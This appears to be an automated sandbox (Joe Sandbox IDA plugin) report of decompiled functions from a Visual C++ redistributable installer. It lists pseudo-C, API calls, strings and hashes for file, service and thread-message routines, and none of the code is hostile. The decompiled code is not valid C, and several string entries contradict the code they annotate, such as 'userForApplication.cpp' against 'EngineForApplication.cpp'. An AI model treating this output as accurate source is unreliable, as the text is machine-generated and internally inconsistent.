                                                                          			E00054C67(void* __ecx, WCHAR* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, void** _a20) {
				void** _t10;
				void* _t14;
				void* _t15;
				void* _t16;

				_t14 = __ecx;
				_t15 = CreateFileW(_a4, 0x40000000, 1, 0, 2, _a8, 0);
				if(_t15 != 0xffffffff) {
					_t16 = E00054CEE(_t14, _t15, _a12, _a16);
					if(_t16 >= 0) {
						_t10 = _a20;
						if(_t10 != 0) {
							 *_t10 = _t15;
							_t15 = _t15 | 0xffffffff;
						}
					}
					if(_t15 != 0xffffffff) {
						CloseHandle(_t15);
					}
				} else {
					_t19 =  <=  ? GetLastError() : _t11 & 0x0000ffff | 0x80070000;
					_t16 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t11 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "fileutil.cpp", 0x3c2, _t16);
				}
				return _t16;
			}







                                                                          0x00054c67
                                                                          0x00054c85
                                                                          0x00054c8a
                                                                          0x00054cc8
                                                                          0x00054ccc
                                                                          0x00054cce
                                                                          0x00054cd3
                                                                          0x00054cd5
                                                                          0x00054cd7
                                                                          0x00054cd7
                                                                          0x00054cd3
                                                                          0x00054cdd
                                                                          0x00054ce0
                                                                          0x00054ce0
                                                                          0x00054c8c
                                                                          0x00054c9d
                                                                          0x00054ca7
                                                                          0x00054cb5
                                                                          0x00054cb5
                                                                          0x00054ceb

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(0005B4F0,40000000,00000001,00000000,00000002,00000080,00000000,00020328,00000000,?,0001F37F,?,00000080,0005B4F0,00000000), ref: 00054C7F
                                                                          • GetLastError.KERNEL32(?,0001F37F,?,00000080,0005B4F0,00000000,?,00020328,?,00000094,?,?,?,?,?,00000000), ref: 00054C8C
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,0001F37F,?,0001F37F,?,00000080,0005B4F0,00000000,?,00020328,?,00000094), ref: 00054CE0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 2528220319-2299628883
                                                                          • Opcode ID: 91623fd1642f24f342a96506c34feb727c7c36fc6e43124f840e98ab7b8802cd
                                                                          • Instruction ID: 3427c8fe50ad74e12045cea0e4324b522fb40e37a0bd866ccf6e315a73b44fa0
                                                                          • Opcode Fuzzy Hash: 91623fd1642f24f342a96506c34feb727c7c36fc6e43124f840e98ab7b8802cd
                                                                          • Instruction Fuzzy Hash: 5401A732B013246BE7715EA99C05FDB3E99DB817B5F014211FE25AB1E0C735DC6197A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00054840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00054840(void* __ecx, WCHAR* _a4, intOrPtr _a8) {
				void* _t4;
				void* _t14;
				void* _t16;
				void* _t18;

				_t14 = __ecx;
				if(_a4 != 0) {
					_t16 = CreateFileW(_a4, 0x80, 1, 0, 3, 0x80, 0);
					if(_t16 != 0xffffffff) {
						_t18 = E000548CB(_t14, _t16, _a8);
						CloseHandle(_t16);
					} else {
						_t21 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
						_t18 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "fileutil.cpp", 0x228, _t18);
					}
				} else {
					_t18 = 0x80070057;
					E000137D3(_t4, "fileutil.cpp", 0x223, 0x80070057);
				}
				return _t18;
			}







                                                                          0x00054840
                                                                          0x00054848
                                                                          0x0005487a
                                                                          0x0005487f
                                                                          0x000548ba
                                                                          0x000548bd
                                                                          0x00054881
                                                                          0x00054892
                                                                          0x0005489c
                                                                          0x000548aa
                                                                          0x000548aa
                                                                          0x0005484a
                                                                          0x0005484a
                                                                          0x0005485a
                                                                          0x0005485a
                                                                          0x000548c8

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,00038A30,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 00054874
                                                                          • GetLastError.KERNEL32(?,00038A30,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,userVersion,000002C0,000000B0), ref: 00054881
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorFileLast
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1214770103-2299628883
                                                                          • Opcode ID: 29ecada04a38ea52115c849d0c92eae1c3316fec5a74cfee5078af54f159ad7b
                                                                          • Instruction ID: 79655c183040c1adc6e0771cc46a1fa24c2ca3d6f13a783f4301dc787ae59772
                                                                          • Opcode Fuzzy Hash: 29ecada04a38ea52115c849d0c92eae1c3316fec5a74cfee5078af54f159ad7b
                                                                          • Instruction Fuzzy Hash: C701F932B40720BAF73026E4AC49FFF3688DB40BA6F014221FE05AF1D0CA695D8496F4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000369A8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48serviceCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E000369A8(void* __ebx, void* _a4) {
				signed int _v8;
				struct _SERVICE_STATUS _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t7;
				signed short _t15;
				void* _t19;
				signed int _t20;
				void* _t27;
				void* _t28;
				int _t29;
				signed int _t33;

				_t19 = __ebx;
				_t7 =  *0x7a008; // 0xfbf51acb
				_v8 = _t7 ^ _t33;
				_t26 = _a4;
				_t20 = 7;
				_t27 =  &_v36;
				_t29 = 0;
				memset(_t27, 0, _t20 << 2);
				_t28 = _t27 + _t20;
				if(ControlService(_a4, 1,  &_v36) == 0) {
					_t15 = GetLastError();
					_t32 =  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
					_t29 =  >=  ? 0x80004005 :  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "msuengine.cpp", 0x1fc, _t29);
					_push("Failed to stop wusa service.");
					_push(_t29);
					E0005012F();
				}
				return E0003DE36(_t19, _v8 ^ _t33, _t26, _t28, _t29);
			}
















                                                                          0x000369a8
                                                                          0x000369ae
                                                                          0x000369b5
                                                                          0x000369b8
                                                                          0x000369c1
                                                                          0x000369c2
                                                                          0x000369c5
                                                                          0x000369c7
                                                                          0x000369c7
                                                                          0x000369d8
                                                                          0x000369da
                                                                          0x000369eb
                                                                          0x000369f5
                                                                          0x00036a03
                                                                          0x00036a08
                                                                          0x00036a0d
                                                                          0x00036a0e
                                                                          0x00036a14
                                                                          0x00036a26

                                                                          APIs
                                                                          • ControlService.ADVAPI32(000368BA,00000001,?,00000001,00000000,?,?,?,?,?,?,000368BA,00000000), ref: 000369D0
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,000368BA,00000000), ref: 000369DA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ControlErrorLastService
                                                                          • String ID: @Met$Failed to stop wusa service.$msuuser.cpp
                                                                          • API String ID: 4114567744-210560903
                                                                          • Opcode ID: 3574237a9441289d161a9537ed7f09392e9db6a189eabc87f81086e9415b8fd4
                                                                          • Instruction ID: 2b09c1dc06e22594ee4fcde655fce14f761c76b461e4e974577483e89bdd0421
                                                                          • Opcode Fuzzy Hash: 3574237a9441289d161a9537ed7f09392e9db6a189eabc87f81086e9415b8fd4
                                                                          • Instruction Fuzzy Hash: EA01DB72B403246BE710ABB5AC05BEB77E9DF48711F01412AFD04FB1C0DA249D4586D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001D39D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 45%
                                                                          			E0001D39D(intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr* _t10;
				long _t15;
				long _t18;
				intOrPtr _t19;

				_t19 = _a4;
				_t18 = 0;
				_t2 = _t19 + 0x18; // 0xd0
				EnterCriticalSection(_t2);
				_t3 = _t19 + 0x30; // 0xe8
				_t15 = 1;
				if(InterlockedCompareExchange(_t3, 1, 0) != 0) {
					_t15 = 0;
					_t18 = 0x8007139f;
				}
				_t4 = _t19 + 0x18; // 0xd0
				LeaveCriticalSection(_t4);
				_t10 = _a8;
				if(_t10 != 0) {
					 *_t10 = _t15;
				}
				if(_t18 < 0) {
					E000137D3(_t10, "userexperience.cpp", 0xea, _t18);
					_push("Engine active cannot be changed because it was already in that state.");
					_push(_t18);
					E0005012F();
				}
				return _t18;
			}







                                                                          0x0001d3a2
                                                                          0x0001d3a6
                                                                          0x0001d3a8
                                                                          0x0001d3ac
                                                                          0x0001d3b5
                                                                          0x0001d3b8
                                                                          0x0001d3c3
                                                                          0x0001d3c5
                                                                          0x0001d3c7
                                                                          0x0001d3c7
                                                                          0x0001d3cc
                                                                          0x0001d3d0
                                                                          0x0001d3d6
                                                                          0x0001d3db
                                                                          0x0001d3dd
                                                                          0x0001d3dd
                                                                          0x0001d3e1
                                                                          0x0001d3ee
                                                                          0x0001d3f3
                                                                          0x0001d3f8
                                                                          0x0001d3f9
                                                                          0x0001d3ff
                                                                          0x0001d406

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00026E4B,000000B8,00000000,?,00000000,76B6A770), ref: 0001D3AC
                                                                          • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0001D3BB
                                                                          • LeaveCriticalSection.KERNEL32(000000D0,?,00026E4B,000000B8,00000000,?,00000000,76B6A770), ref: 0001D3D0
                                                                          Strings
                                                                          • userexperience.cpp, xrefs: 0001D3E9
                                                                          • user active cannot be changed because it was already in that state., xrefs: 0001D3F3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                          • String ID: user active cannot be changed because it was already in that state.$userexperience.cpp
                                                                          • API String ID: 3376869089-1544469594
                                                                          • Opcode ID: dfe368c0ffc3165c89476c3a7966bc7586c96c4b1ee24ee83058d35b955671dc
                                                                          • Instruction ID: 83b7fedcc5e1cab484a5f2681c4c488afe052afc5b96d8a0d887322e7bd40aab
                                                                          • Opcode Fuzzy Hash: dfe368c0ffc3165c89476c3a7966bc7586c96c4b1ee24ee83058d35b955671dc
                                                                          • Instruction Fuzzy Hash: 0AF0AF763007056BA7106EA6AC84DEB73ADFB85766700442ABA01C7540DB74F9458735
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00044897 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 20%
                                                                          			E00044897(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed int _t10;
				struct HINSTANCE__** _t12;
				void* _t18;
				void* _t23;
				void* _t24;
				void* _t25;
				intOrPtr* _t26;
				signed int _t27;

				_t10 =  *0x7a008; // 0xfbf51acb
				_v8 = _t10 ^ _t27;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_push(_t25);
					_t26 = GetProcAddress(_v12, "CorExitProcess");
					if(_t26 != 0) {
						 *0x5b3d0(_a4);
						 *_t26();
					}
					_pop(_t25);
				}
				if(_v12 != 0) {
					FreeLibrary(_v12);
				}
				return E0003DE36(_t18, _v8 ^ _t27, _t23, _t24, _t25);
			}















                                                                          0x0004489e
                                                                          0x000448a5
                                                                          0x000448a8
                                                                          0x000448ac
                                                                          0x000448b7
                                                                          0x000448bf
                                                                          0x000448c1
                                                                          0x000448d0
                                                                          0x000448d4
                                                                          0x000448db
                                                                          0x000448e1
                                                                          0x000448e1
                                                                          0x000448e3
                                                                          0x000448e3
                                                                          0x000448e8
                                                                          0x000448ed
                                                                          0x000448ed
                                                                          0x00044900

                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00044848,00000000,?,000447E8,00000000,00077CF8,0000000C,0004493F,00000000,00000002), ref: 000448B7
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000448CA
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00044848,00000000,?,000447E8,00000000,00077CF8,0000000C,0004493F,00000000,00000002), ref: 000448ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 552480f90908666eea2df5b8ad79f485eae5c0cbb95ab2c84fcfb09a5c1ba28d
                                                                          • Instruction ID: 8bcd836543938873cc966fa86fff5041073a4a5fcde49dc5189c01df3d00ae32
                                                                          • Opcode Fuzzy Hash: 552480f90908666eea2df5b8ad79f485eae5c0cbb95ab2c84fcfb09a5c1ba28d
                                                                          • Instruction Fuzzy Hash: 5BF04F74A00208BBDB559BA4DC19BEEBFB8EF44752F4041A9F809A6190DF785E44CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002EA72 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 33%
                                                                          			E0002EA72(intOrPtr _a4, long _a8) {
				signed short _t9;
				intOrPtr _t13;
				int _t16;

				_t13 = _a4;
				_t16 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t13 + 0xc)) + 0x4b0)) == 0xffffffff) {
					if(PostThreadMessageW( *(_t13 + 0x10), 0x9002, 0, _a8) == 0) {
						_t9 = GetLastError();
						_t19 =  <=  ? _t9 : _t9 & 0x0000ffff | 0x80070000;
						_t16 =  >=  ? 0x80004005 :  <=  ? _t9 : _t9 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "EngineForApplication.cpp", 0x2a5, _t16);
						_push("Failed to post elevate message.");
						_push(_t16);
						E0005012F();
					}
				} else {
					_t16 = 0x800704df;
				}
				return _t16;
			}






                                                                          0x0002ea75
                                                                          0x0002ea79
                                                                          0x0002ea85
                                                                          0x0002eaa2
                                                                          0x0002eaa4
                                                                          0x0002eab5
                                                                          0x0002eabf
                                                                          0x0002eacd
                                                                          0x0002ead2
                                                                          0x0002ead7
                                                                          0x0002ead8
                                                                          0x0002eade
                                                                          0x0002ea87
                                                                          0x0002ea87
                                                                          0x0002ea87
                                                                          0x0002eae3

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post elevate message.
                                                                          • API String ID: 2609174426-4257857053
                                                                          • Opcode ID: 600ae1602b687031708991d69f301d817a61c34f793e4f7e0f41bdaabc6b3d8d
                                                                          • Instruction ID: da3fb69362e8a3a2f94cd3c838f11f6c5c214c573cb366187717a8173239cbf7
                                                                          • Opcode Fuzzy Hash: 600ae1602b687031708991d69f301d817a61c34f793e4f7e0f41bdaabc6b3d8d
                                                                          • Instruction Fuzzy Hash: B6F0F036780330ABE3206AA9AC09AA737C8EF04761F114229FE18EB5D1D7259C0186E6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001D7CF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E0001D7CF(intOrPtr _a4) {
				_Unknown_base(*)()* _t12;
				signed int _t18;
				void* _t19;
				intOrPtr _t22;

				_t22 = _a4;
				_t19 = 0;
				_t18 =  *(_t22 + 0x10);
				if(_t18 != 0) {
					 *((intOrPtr*)( *_t18 + 8))(_t18);
					 *(_t22 + 0x10) =  *(_t22 + 0x10) & 0;
				}
				if( *(_t22 + 0xc) != _t19) {
					_t12 = GetProcAddress( *(_t22 + 0xc), "BootstrapperApplicationDestroy");
					if(_t12 != 0) {
						 *_t12();
					}
					if(FreeLibrary( *(_t22 + 0xc)) == 0) {
						_t19 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					}
					 *(_t22 + 0xc) =  *(_t22 + 0xc) & 0x00000000;
				}
				return _t19;
			}







                                                                          0x0001d7d3
                                                                          0x0001d7d7
                                                                          0x0001d7d9
                                                                          0x0001d7de
                                                                          0x0001d7e3
                                                                          0x0001d7e6
                                                                          0x0001d7e6
                                                                          0x0001d7ec
                                                                          0x0001d7f6
                                                                          0x0001d7fe
                                                                          0x0001d800
                                                                          0x0001d800
                                                                          0x0001d80d
                                                                          0x0001d820
                                                                          0x0001d820
                                                                          0x0001d823
                                                                          0x0001d823
                                                                          0x0001d82c

                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0001D7F6
                                                                          • FreeLibrary.KERNEL32(?,?,000147D1,00000000,?,?,00015386,?,?), ref: 0001D805
                                                                          • GetLastError.KERNEL32(?,000147D1,00000000,?,?,00015386,?,?), ref: 0001D80F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorFreeLastLibraryProc
                                                                          • String ID: @Met$BootstrapperApplicationDestroy
                                                                          • API String ID: 1144718084-3300157853
                                                                          • Opcode ID: 3690f375e41a8f320371adb3e0fcd80f046523dd704ccc024e070d7a4d692027
                                                                          • Instruction ID: a4ea33a180783d18a3a05af89c90c8617f9429b8d54d9f9d3fc3928d91436f5c
                                                                          • Opcode Fuzzy Hash: 3690f375e41a8f320371adb3e0fcd80f046523dd704ccc024e070d7a4d692027
                                                                          • Instruction Fuzzy Hash: 73F0F9362007019FE7205FA6DC08AA7B7E9BF80763B01C53EE966C6560DB79E854CB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002F086 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 28%
                                                                          			E0002F086(intOrPtr _a4, long _a8) {
				signed short _t7;
				int _t13;

				_t13 = 0;
				if(PostThreadMessageW( *(_a4 + 0x10), 0x9001, 0, _a8) == 0) {
					_t7 = GetLastError();
					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "EngineForApplication.cpp", 0x292, _t13);
					_push("Failed to post plan message.");
					_push(_t13);
					E0005012F();
				}
				return _t13;
			}





                                                                          0x0002f090
                                                                          0x0002f0a3
                                                                          0x0002f0a5
                                                                          0x0002f0b6
                                                                          0x0002f0c0
                                                                          0x0002f0ce
                                                                          0x0002f0d3
                                                                          0x0002f0d8
                                                                          0x0002f0d9
                                                                          0x0002f0df
                                                                          0x0002f0e4

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post plan message.
                                                                          • API String ID: 2609174426-3019743703
                                                                          • Opcode ID: 94599b0302888b7a5522f80066f25edcbd4c7d52ba9cca0f2435f251d19c0b79
                                                                          • Instruction ID: 626a553b0b7c64cff5782d2b8b937708659cd92e436a75d74d1110b6339d1d74
                                                                          • Opcode Fuzzy Hash: 94599b0302888b7a5522f80066f25edcbd4c7d52ba9cca0f2435f251d19c0b79
                                                                          • Instruction Fuzzy Hash: 24F0E5327443317BE7202AAAAC09ED77BC9EF04BA1F014021FE0CEB092D625DC0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002F194 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 28%
                                                                          			E0002F194(intOrPtr _a4, int _a8) {
				signed short _t7;
				long _t13;

				_t13 = 0;
				if(PostThreadMessageW( *(_a4 + 0x10), 0x9005, _a8, 0) == 0) {
					_t7 = GetLastError();
					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "EngineForApplication.cpp", 0x2c3, _t13);
					_push("Failed to post shutdown message.");
					_push(_t13);
					E0005012F();
				}
				return _t13;
			}





                                                                          0x0002f19b
                                                                          0x0002f1b1
                                                                          0x0002f1b3
                                                                          0x0002f1c4
                                                                          0x0002f1ce
                                                                          0x0002f1dc
                                                                          0x0002f1e1
                                                                          0x0002f1e6
                                                                          0x0002f1e7
                                                                          0x0002f1ed
                                                                          0x0002f1f2

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post shutdown message.
                                                                          • API String ID: 2609174426-1833910594
                                                                          • Opcode ID: 845e5941340a0f32ce0c1ef896e70a224541c64cc35ff93c4f41c5dc128807d2
                                                                          • Instruction ID: 097e6a441764b61b9a91544208d9077bb5d6ecb3cae67252b5810f73a3b96583
                                                                          • Opcode Fuzzy Hash: 845e5941340a0f32ce0c1ef896e70a224541c64cc35ff93c4f41c5dc128807d2
                                                                          • Instruction Fuzzy Hash: F6F0EC337403317BF7206AAAAC09ED77BD8EF04BA1F014025FE08EB091D615DD0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003051A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetEvent.KERNEL32(0005B468,00000000,?,0003145A,?,00000000,?,0001C121,?,000152FD,?,000273B2,?,?,000152FD,?), ref: 00030524
                                                                          • GetLastError.KERNEL32(?,0003145A,?,00000000,?,0001C121,?,000152FD,?,000273B2,?,?,000152FD,?,0001533D,00000001), ref: 0003052E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorEventLast
                                                                          • String ID: @Met$Failed to set begin operation event.$cabextract.cpp
                                                                          • API String ID: 3848097054-3980609822
                                                                          • Opcode ID: ae57e1606070e964b57d58955594596b9ba0baf9821b6e734783743dacfeed99
                                                                          • Instruction ID: 53c18ffcdcdb6ca203efc093704003869b6a062568bd473c2cb8a28b9a82f116
                                                                          • Opcode Fuzzy Hash: ae57e1606070e964b57d58955594596b9ba0baf9821b6e734783743dacfeed99
